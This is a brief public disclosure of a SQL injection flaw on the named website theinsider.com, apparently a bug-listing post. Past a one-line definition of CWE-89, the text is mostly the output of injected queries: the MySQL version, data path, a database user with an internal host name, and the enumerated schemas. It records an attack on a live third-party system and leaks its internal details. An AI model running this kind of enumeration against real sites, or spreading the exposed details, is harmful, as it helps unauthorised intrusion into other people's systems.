SQL Injection, Select Version, Database User, MySQL Server, theinsider.com

CWE-89: SQL Injection; Description: SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications.

SQL Injection PoC

Version: 5.0.45-standard-log

select @@version = 5.0.45-standard-log
select @@datadir = /var/lib/mysql
select user() = etonline@ws3054-fe.drt.cbsig.net
select database() = etonline
SELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema
SELECT schema_name FROM information_schema.schemata limit 1,1 = etlist
SELECT schema_name FROM information_schema.schemata limit 2,1 = etonline
SELECT schema_name FROM information_schema.schemata limit 3,1 = test